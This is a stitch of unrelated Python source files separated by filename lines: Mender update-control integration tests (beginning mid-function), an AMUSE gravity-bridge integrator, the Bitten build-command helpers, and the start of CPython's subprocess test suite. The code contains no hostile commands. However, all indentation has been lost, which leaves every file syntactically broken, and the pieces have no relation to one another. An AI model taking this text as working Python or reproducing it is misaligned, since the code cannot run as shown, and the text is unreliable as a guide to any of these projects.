)
prepare_deployment_response(
connection,
artifact_file.name,
device_type,
artifact_name=artifact_name,
deployment_id=deployment_id,
update_control_map=update_control_map,
)
def wait_for_state(connection, state_to_wait_for):
log = []
attempts = 10
while attempts > 0:
output = connection.run(
"cat /data/logger-update-module.log 2>/dev/null || true"
).stdout.strip()
log = [line.split()[1] for line in output.split("\n") if len(line) > 0]
if state_to_wait_for in log:
break
time.sleep(6)
attempts -= 1
else:
pytest.fail(f"Could not find {state_to_wait_for} in log")
return log
class TestUpdateControl:
test_update_control_maps_cases = [
{"name": "Empty map", "case": {"maps": [{"id": MUID,}], "success": True,},},
{
"name": "Fail in ArtifactInstall_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactInstall_Enter": {"action": "fail",},},
}
],
"success": False,
"last_successful_state": "Download",
},
},
{
"name": "Fail in ArtifactReboot_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactReboot_Enter": {"action": "fail",},},
}
],
"success": False,
"last_successful_state": "ArtifactInstall",
},
},
{
"name": "Fail in ArtifactCommit_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactCommit_Enter": {"action": "fail",},},
}
],
"success": False,
"last_successful_state": "ArtifactVerifyReboot",
},
},
{
"name": "Pause in ArtifactInstall_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactInstall_Enter": {"action": "pause",},},
}
],
"success": True,
"state_before_pause": "Download",
"continue_map": {
"id": MUID,
"states": {"ArtifactInstall_Enter": {"action": "continue",},},
},
"last_successful_state": "ArtifactCommit",
},
},
{
"name": "Pause in ArtifactReboot_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactReboot_Enter": {"action": "pause",},},
}
],
"success": True,
"state_before_pause": "ArtifactInstall",
"continue_map": {
"id": MUID,
"states": {"ArtifactReboot_Enter": {"action": "continue",},},
},
"last_successful_state": "ArtifactCommit",
},
},
{
"name": "Pause in ArtifactCommit_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactCommit_Enter": {"action": "pause",},},
}
],
"success": True,
"state_before_pause": "ArtifactVerifyReboot",
"continue_map": {
"id": MUID,
"states": {"ArtifactCommit_Enter": {"action": "continue",},},
},
"last_successful_state": "ArtifactCommit",
},
},
{
"name": "Expire in ArtifactInstall_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {
"ArtifactInstall_Enter": {
"action": "pause",
"on_map_expire": "continue",
},
},
}
],
"take_at_least": EXPIRATION_TIME,
"success": True,
"last_successful_state": "ArtifactCommit",
},
},
{
"name": "Reboot and expire in ArtifactInstall_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {
"ArtifactInstall_Enter": {
"action": "pause",
"on_map_expire": "continue",
},
},
}
],
"restart_client": True,
"fail_after": BETWEEN_EXPIRATIONS,
"success": True,
"last_successful_state": "ArtifactCommit",
},
},
{
"name": "Continue, then fail in ArtifactInstall_Enter",
"case": {
"maps": [
{
"id": MUID,
"states": {
"ArtifactInstall_Enter": {
"action": "continue",
"on_action_executed": "fail",
},
},
}
],
"second_deployment": True,
"success": False,
"last_successful_state": "Download",
},
},
{
"name": "continue with higher priority",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactInstall_Enter": {"action": "fail",},},
},
{
"id": MUID2,
"states": {"ArtifactInstall_Enter": {"action": "continue",},},
"priority": 1,
},
],
# "continue" has lowest precedence, even if the priority is
# higher.
"success": False,
"last_successful_state": "Download",
},
},
{
"name": "force_continue with higher priority",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactInstall_Enter": {"action": "pause",},},
},
{
"id": MUID2,
"states": {
"ArtifactInstall_Enter": {"action": "force_continue",},
},
"priority": 1,
},
],
"success": True,
"last_successful_state": "ArtifactCommit",
},
},
{
"name": "force_continue with lower priority",
"case": {
"maps": [
{
"id": MUID,
"states": {"ArtifactCommit_Enter": {"action": "fail",},},
},
{
"id": MUID2,
"states": {
"ArtifactCommit_Enter": {"action": "force_continue",},
},
"priority": -1,
},
],
"success": False,
"last_successful_state": "ArtifactVerifyReboot",
},
},
{
"name": "Expired and purged map",
"case": {
"maps": [
{
"id": MUID,
"states": {
# Install a map which succeeds, but sets up for failure afterwards.
"ArtifactInstall_Enter": {
"action": "continue",
"on_action_executed": "fail",
},
# Then expire the map.
"ArtifactCommit_Enter": {
"action": "pause",
"on_map_expire": "continue",
},
},
}
],
# The second deployment should succeed despite the "fail" above,
# because expired maps are purged between deployments.
"second_deployment": True,
"take_at_least": EXPIRATION_TIME,
"success": True,
"last_successful_state": "ArtifactCommit",
},
},
]
@pytest.mark.min_mender_version("2.7.0")
@pytest.mark.parametrize(
"case_name,case",
[(case["name"], case["case"]) for case in test_update_control_maps_cases],
)
def test_update_control_maps(
self,
case_name,
case,
setup_board,
connection,
second_connection,
setup_mock_server,
bitbake_variables,
bitbake_path,
):
try:
start_and_ready_mender_client(connection, second_connection)
for m in case["maps"]:
set_update_control_map(connection, m)
if case.get("restart_client"):
# Restart client after map insertion in order to trigger the
# boot expiration mechanism.
connection.run("systemctl restart mender-client")
now = time.time()
make_and_deploy_artifact(
connection, bitbake_variables["MENDER_DEVICE_TYPE"]
)
connection.run("mender check-update")
log = []
pause_state_observed = 0
continue_map_inserted = False
second_deployment_done = False
PAUSE_STATE_OBSERVE_COUNT = 2
while time.time() - now <= case.get("fail_after", FAIL_TIME):
output = connection.run(
"cat /data/logger-update-module.log 2>/dev/null || true"
).stdout.strip()
log = [line.split()[1] for line in output.split("\n") if len(line) > 0]
# Check for the state before the pause state, and verify it's
# the last state (meaning the client is currently waiting before
# the next state).
if (
not continue_map_inserted
and case.get("state_before_pause")
and len(log) > 0
and log[-1] == case["state_before_pause"]
):
pause_state_observed += 1
# Verify that it stays in paused mode.
if pause_state_observed >= PAUSE_STATE_OBSERVE_COUNT:
# Now insert the map to unblock the pause.
set_update_control_map(connection, case["continue_map"])
continue_map_inserted = True
# Cleanup is the last state of a deployment
if "Cleanup" in log:
if case.get("second_deployment") and not second_deployment_done:
# When making two deployments, we assume the first one
# is successful.
assert "ArtifactFailure" not in log
connection.run("rm -f /data/logger-update-module.log")
make_and_deploy_artifact(
connection, bitbake_variables["MENDER_DEVICE_TYPE"]
)
connection.run("mender check-update")
second_deployment_done = True
else:
break
time.sleep(5)
else:
pytest.fail("Could not find Cleanup in log, did deployment not finish?")
if case.get("take_at_least"):
assert (
time.time() - now >= case["take_at_least"]
), "Deployment finished before it was supposed to!"
if case["success"]:
assert "ArtifactFailure" not in log
else:
assert "ArtifactFailure" in log
assert (
log[log.index("ArtifactFailure") - 1]
== case["last_successful_state"]
)
if case.get("state_before_pause"):
assert (
pause_state_observed >= PAUSE_STATE_OBSERVE_COUNT
), "Looks like the client did not pause!"
except:
connection.run("journalctl --unit mender-client | cat")
connection.run("journalctl --unit mender-mock-server | cat")
raise
finally:
cleanup_deployment_response(connection)
# Reset update control maps.
clear_update_control_maps(connection)
connection.run("systemctl stop mender-client")
cleanup_mender_state(connection)
connection.run("rm -f /data/logger-update-module.log")
@pytest.mark.min_mender_version("2.7.0")
def test_invalid_update_control_map(
self, setup_board, connection, second_connection, setup_mock_server
):
try:
start_and_ready_mender_client(connection, second_connection)
status = connection.run(
"""dbus-send --system --dest=io.mender.UpdateManager --print-reply /io/mender/UpdateManager io.mender.Update1.SetUpdateControlMap string:'{"not-a":"valid-map"}'""",
warn=True,
)
assert status.return_code != 0
finally:
connection.run("systemctl stop mender-client")
cleanup_mender_state(connection)
test_update_control_maps_cleanup_cases = [
{
"name": "Cleanup after success",
"case": {
"pause_map": {
"priority": 0,
"states": {"ArtifactCommit_Enter": {"action": "pause",},},
},
"pause_state": "ArtifactVerifyReboot",
"continue_map": {
"id": MUID,
"priority": 10,
"states": {
"ArtifactInstall_Enter": {"action": "fail",},
"ArtifactCommit_Enter": {"action": "force_continue",},
},
},
"expect_failure": False,
},
},
{
"name": "Cleanup after failure",
"case": {
"pause_map": {
"priority": 0,
"states": {"ArtifactCommit_Enter": {"action": "pause",},},
},
"pause_state": "ArtifactVerifyReboot",
"continue_map": {
"id": MUID,
"priority": 10,
"states": {
"ArtifactInstall_Enter": {"action": "fail",},
"ArtifactCommit_Enter": {"action": "fail",},
},
},
"expect_failure": True,
},
},
]
@pytest.mark.min_mender_version("2.7.0")
@pytest.mark.parametrize(
"case_name,case",
[
(case["name"], case["case"])
for case in test_update_control_maps_cleanup_cases
],
)
def test_update_control_map_cleanup(
self,
case_name,
case,
setup_board,
connection,
second_connection,
setup_mock_server,
bitbake_variables,
bitbake_path,
):
try:
start_and_ready_mender_client(connection, second_connection)
# First deployment sends the "pause" control map via Server API with the
# update; then once the client is paused, the map is overridden via DBus API.
# The deployment shall succeed or fail dependending of the test case
make_and_deploy_artifact(
connection,
bitbake_variables["MENDER_DEVICE_TYPE"],
deployment_id=MUID,
update_control_map=case["pause_map"],
)
connection.run("mender check-update")
wait_for_state(connection, case["pause_state"])
set_update_control_map(connection, case["continue_map"])
log = wait_for_state(connection, "Cleanup")
if case["expect_failure"]:
assert "ArtifactFailure" in log
else:
assert "ArtifactFailure" not in log
# Second deployment shall succeed
connection.run("rm -f /data/logger-update-module.log")
cleanup_deployment_response(connection)
make_and_deploy_artifact(
connection,
bitbake_variables["MENDER_DEVICE_TYPE"],
deployment_id=MUID2,
update_control_map=None,
)
connection.run("mender check-update")
log = wait_for_state(connection, "Cleanup")
assert "ArtifactFailure" not in log
except:
connection.run("journalctl --unit mender-client | cat")
connection.run("journalctl --unit mender-mock-server | cat")
raise
finally:
cleanup_deployment_response(connection)
clear_update_control_maps(connection)
connection.run("systemctl stop mender-client")
cleanup_mender_state(connection)
connection.run("rm -f /data/logger-update-module.log")
@pytest.mark.min_mender_version("2.7.0")
def test_many_state_transitions_with_update_control(
self,
setup_board,
connection,
second_connection,
setup_mock_server,
bitbake_variables,
bitbake_path,
):
"""Test whether we can make many state transitions with update control without
triggering the "too many state transitions" error."""
try:
start_and_ready_mender_client(connection, second_connection)
ucm = (
"""{
"ID": "%s",
"states": {
"ArtifactInstall_Enter": {
"action": "pause"
}
}
}"""
% MUID
)
with tempfile.TemporaryDirectory() as tmpdir:
script = os.path.join(tmpdir, "map-insert.sh")
with open(script, "w") as fd:
fd.write(
"""#!/bin/sh
while sleep 0.2; do
dbus-send --system --dest=io.mender.UpdateManager --print-reply /io/mender/UpdateManager io.mender.Update1.SetUpdateControlMap string:'%s'
done
"""
% ucm
)
put_no_sftp(script, connection, remote="/data/map-insert.sh")
# Constantly reinsert map over and over in the background, to force
# state transitions.
connection.run("systemd-run sh /data/map-insert.sh")
now = time.time()
make_and_deploy_artifact(
connection, bitbake_variables["MENDER_DEVICE_TYPE"]
)
connection.run("mender check-update")
timeout = now + 300
# Wait until we have received 100 state transitions, which is way
# more than would cause a failure.
while time.time() < timeout:
output = connection.run(
"journalctl --unit mender-client --since '%s' | grep 'State transition: mender-update-control '"
% time.strftime("%Y-%m-%d %H:%M:%S UTC", time.gmtime(now)),
warn=True,
).stdout
if len(output.split("\n")) >= 100:
break
else:
pytest.fail(
"Timed out without reaching the required number of state transitions."
)
# Just double check that we are indeed paused, as we expect.
log = wait_for_state(connection, "Download")
assert "Cleanup" not in log
# Force it to continue.
set_update_control_map(
connection,
{
"ID": MUID2,
"priority": 10,
"states": {"ArtifactInstall_Enter": {"action": "force_continue"}},
},
)
# Rest of deployment should finish successfully.
log = wait_for_state(connection, "Cleanup")
assert "ArtifactFailure" not in log
except:
connection.run("journalctl --unit mender-client | cat")
connection.run("journalctl --unit mender-mock-server | cat")
raise
finally:
connection.run("pkill -f map-insert.sh", warn=True)
cleanup_deployment_response(connection)
# Reset update control maps.
clear_update_control_maps(connection)
connection.run("systemctl stop mender-client")
cleanup_mender_state(connection)
connection.run("rm -f /data/logger-update-module.log")
|
fast.py
|
# issues:
# - for now, units in si
# - a common coordinate system is used for all systems
# - sync of systems should be checked
# - timestepping: adaptive dt?
from amuse.units import units
from amuse.units.quantities import zero
import threading
from amuse import datamodel
def radius_or_hsmooth(parts):
d=set(dir(parts))
if "radius" in d:
return parts.radius
else:
if "h_smooth" in d:
return parts.h_smooth
else:
print d
raise Exception
def potential_energy(system, get_potential):
parts=system.particles.copy()
pot=get_potential(parts.radius,parts.x,parts.y,parts.z)
return (pot*parts.mass).sum()/2
def kick_system(system, get_gravity, dt):
parts=system.particles.copy()
ax,ay,az=get_gravity(parts.radius,parts.x,parts.y,parts.z)
parts.vx=parts.vx+dt*ax
parts.vy=parts.vy+dt*ay
parts.vz=parts.vz+dt*az
# parts.copy_values_of_state_attributes_to(system.particles)
channel = parts.new_channel_to(system.particles)
channel.copy_attributes(["vx","vy","vz"])
class FAST(object):
def __init__(self,verbose=False,timestep=None):
"""
verbose indicates whether to output some run info
"""
self.systems=set()
self.partners=dict()
self.time_offsets=dict()
self.time=0. | units.s
self.do_sync=dict()
self.verbose=verbose
self.timestep=timestep
def set_timestep(self,timestep):
self.timestep=timestep
def add_system(self, interface, partners=set(),do_sync=True):
"""
add a system to bridge integrator
"""
if hasattr(interface,"model_time"):
self.time_offsets[interface]=(self.time-interface.model_time)
else:
self.time_offsets[interface]=0.
self.systems.add(interface)
for p in partners:
if not hasattr(interface,"get_gravity_at_point"):
return -1
self.partners[interface]=partners
self.do_sync[interface]=do_sync
return 0
def evolve_model(self,tend):
"""
evolve combined system to tend, timestep fixes timestep
"""
timestep=self.timestep
if timestep is None:
timestep=tend-self.time
first=True
while self.time < (tend-timestep/2.):
if first:
self.kick_systems(timestep/2.)
first=False
else:
self.kick_systems(timestep)
self.drift_systems(self.time+timestep)
self.time=self.time+timestep
if not first:
self.kick_systems(timestep/2.)
return 0
def synchronize_model(self):
"""
explicitly synchronize all components
"""
for x in self.systems:
if hasattr(x,"synchronize_model"):
if(self.verbose): print x.__class__.__name__,"is synchronizing",
x.synchronize_model()
if(self.verbose): print ".. done"
def get_potential_at_point(self,radius,x,y,z):
err=0
pot=0.*radius
for x in self.systems:
_pot,err=x.get_potential_at_point(radius,x,y,z)
if err != 0:
break
pot=pot+_pot
return pot,err
def get_gravity_at_point(self,radius,x,y,z):
err=0
ax=0.*radius
ay=0.*radius
az=0.*radius
for x in self.systems:
_ax,_ay,_az,err=x.get_gravity_at_point(radius,x,y,z)
if err != 0:
break
ax=ax+_ax
ay=ay+_ay
az=az+_az
return ax,ay,az,err
@property
def potential_energy(self):
Ep=zero
for x in self.systems:
Ep+=x.potential_energy
if hasattr(x,"particles"):
for y in self.partners[x]:
Ep+=potential_energy(x,y.get_potential_at_point)
return Ep
@property
def kinetic_energy(self):
Ek=zero
for x in self.systems:
Ek+=x.kinetic_energy
return Ek
@property
def thermal_energy(self):
Eth=zero
for x in self.systems:
if hasattr(x,'thermal_energy'):
Eth+=x.thermal_energy
return Eth
@property
def model_time(self):
return self.time
@property
def particles(self):
arr=[]
for x in self.systems:
if hasattr(x,"particles"):
arr.append(x.particles)
return datamodel.ParticlesSuperset(arr)
@property
def gas_particles(self):
arr=[]
for x in self.systems:
if hasattr(x,"gas_particles"):
arr.append(x.gas_particles)
return datamodel.ParticlesSuperset(arr)
# 'private' functions
def drift_systems(self,tend):
threads=[]
for x in self.systems:
if hasattr(x,"evolve_model"):
offset=self.time_offsets[x]
if(self.verbose):
print "evolving", x.__class__.__name__,
threads.append(threading.Thread(target=x.evolve_model, args=(tend-offset,)) )
for x in threads:
x.start()
for x in threads:
x.join()
if(self.verbose):
print ".. done"
return 0
def kick_systems(self,dt):
for x in self.systems:
if self.do_sync[x]:
if hasattr(x,"synchronize_model"):
if(self.verbose): print x.__class__.__name__,"is synchronizing",
x.synchronize_model()
if(self.verbose): print ".. done"
for x in self.systems:
if hasattr(x,"particles"):
for y in self.partners[x]:
if x is not y:
if(self.verbose): print x.__class__.__name__,"receives kick from",y.__class__.__name__,
kick_system(x,y.get_gravity_at_point,dt)
if(self.verbose): print ".. done"
return 0
|
api.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2005-2007 Christopher Lenz <cmlenz@gmx.de>
# Copyright (C) 2007-2010 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://bitten.edgewall.org/wiki/License.
"""Functions and classes used to simplify the implementation recipe commands."""
import logging
import fnmatch
import os
import shlex
import time
import subprocess
import sys
log = logging.getLogger('bitten.build.api')
__docformat__ = 'restructuredtext en'
class BuildError(Exception):
"""Exception raised when a build fails."""
class TimeoutError(Exception):
"""Exception raised when the execution of a command times out."""
def _encode(text):
"""Encode input for call. Input must be unicode or utf-8 string."""
if not isinstance(text, unicode):
text = unicode(text, 'utf-8')
# sys.stdin.encoding might be None (if stdin is directed from a file)
# sys.stdin.encoding might be missing (if it is a StringIO object)
encoding = sys.getfilesystemencoding() or \
getattr(sys.stdin, 'encoding', None) or 'utf-8'
return text.encode(encoding, 'replace')
def _decode(text):
"""Decode output from call."""
try:
return text.decode('utf-8')
except UnicodeDecodeError:
# sys.stdout.encoding might be None (if stdout is directed to a file)
# sys.stdout.encoding might be missing (if it is a StringIO object)
encoding = getattr(sys.stdout, 'encoding', None) or 'utf-8'
return text.decode(encoding, 'replace')
class CommandLine(object):
"""Simple helper for executing subprocesses."""
def __init__(self, executable, args, input=None, cwd=None, shell=False):
"""Initialize the CommandLine object.
:param executable: the name of the program to execute
:param args: a list of arguments to pass to the executable
:param input: string or file-like object containing any input data for
the program
:param cwd: the working directory to change to before executing the
command
"""
self.executable = executable
self.arguments = [_encode(arg) for arg in args]
self.input = input
self.cwd = cwd
if self.cwd:
assert os.path.isdir(self.cwd)
self.shell = shell
self.returncode = None
def execute(self, timeout=None):
"""Execute the command, and return a generator for iterating over
the output written to the standard output and error streams.
:param timeout: number of seconds before the external process
should be aborted (not supported on Windows without
``subprocess`` module / Python 2.4+)
"""
from threading import Thread
from Queue import Queue, Empty
def reader(pipe, pipe_name, queue):
while pipe and not pipe.closed:
line = pipe.readline()
if line == '':
break
queue.put((pipe_name, line))
if not pipe.closed:
pipe.close()
def writer(pipe, data):
if data and pipe and not pipe.closed:
pipe.write(data)
if not pipe.closed:
pipe.close()
args = [self.executable] + self.arguments
try:
p = subprocess.Popen(args, bufsize=1, # Line buffered
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=(self.cwd or None),
shell=self.shell,
universal_newlines=True,
env=None)
except Exception, e:
raise BuildError('Error executing %s: %s %s' % (args,
e.__class__.__name__, str(e)))
log.debug('Executing %s, (pid = %s, timeout = %s)', args, p.pid, timeout)
if self.input:
if isinstance(self.input, basestring):
in_data = self.input
else:
in_data = self.input.read()
else:
in_data = None
queue = Queue()
limit = timeout and timeout + time.time() or 0
pipe_in = Thread(target=writer, args=(p.stdin, in_data))
pipe_out = Thread(target=reader, args=(p.stdout, 'stdout', queue))
pipe_err = Thread(target=reader, args=(p.stderr, 'stderr', queue))
pipe_err.start(); pipe_out.start(); pipe_in.start()
while True:
if limit and limit < time.time():
if hasattr(p, 'kill'): # Python 2.6+
log.debug('Killing process.')
p.kill()
raise TimeoutError('Command %s timed out' % self.executable)
if p.poll() != None and self.returncode == None:
self.returncode = p.returncode
try:
name, line = queue.get(block=True, timeout=.01)
line = line and _decode(line.rstrip().replace('\x00', ''))
if name == 'stderr':
yield (None, line)
else:
yield (line, None)
except Empty:
if self.returncode != None:
break
pipe_out.join(); pipe_in.join(); pipe_err.join()
log.debug('%s exited with code %s', self.executable,
self.returncode)
class FileSet(object):
"""Utility class for collecting a list of files in a directory that match
given name/path patterns."""
DEFAULT_EXCLUDES = ['CVS/*', '*/CVS/*', '.svn/*', '*/.svn/*',
'.DS_Store', 'Thumbs.db']
def __init__(self, basedir, include=None, exclude=None):
"""Create a file set.
:param basedir: the base directory for all files in the set
:param include: a list of patterns that define which files should be
included in the set
:param exclude: a list of patterns that define which files should be
excluded from the set
"""
self.files = []
self.basedir = basedir
self.include = []
if include is not None:
self.include = shlex.split(include)
self.exclude = self.DEFAULT_EXCLUDES[:]
if exclude is not None:
self.exclude += shlex.split(exclude)
for dirpath, dirnames, filenames in os.walk(self.basedir):
dirpath = dirpath[len(self.basedir) + 1:]
for filename in filenames:
filepath = nfilepath = os.path.join(dirpath, filename)
if os.sep != '/':
nfilepath = nfilepath.replace(os.sep, '/')
if self.include:
included = False
for pattern in self.include:
if fnmatch.fnmatchcase(nfilepath, pattern) or \
fnmatch.fnmatchcase(filename, pattern):
included = True
break
if not included:
continue
excluded = False
for pattern in self.exclude:
if fnmatch.fnmatchcase(nfilepath, pattern) or \
fnmatch.fnmatchcase(filename, pattern):
excluded = True
break
if not excluded:
self.files.append(filepath)
def __iter__(self):
"""Iterate over the names of all files in the set."""
for filename in self.files:
yield filename
def __contains__(self, filename):
"""Return whether the given file name is in the set.
:param filename: the name of the file to check
"""
return filename in self.files
|
test_subprocess.py
|
import unittest
from unittest import mock
from test import support
import subprocess
import sys
import platform
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
from test.support import FakePath
try:
import ctypes
except ImportError:
ctypes = None
else:
import ctypes.util
try:
import _testcapi
except ImportError:
_testcapi = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(subprocess._active, "subprocess._active not empty")
self.doCleanups()
support.reap_children()
def assertStderrEqual(self, stderr, expected, msg=None):
# In a debug build, stuff like "[6580 refs]" is printed to stderr at
# shutdown time. That frustrates tests trying to check stderr produced
# from a spawned Python process.
actual = support.strip_python_stderr(stderr)
# strip_python_stderr also strips whitespace, so we do too.
expected = expected.strip()
self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
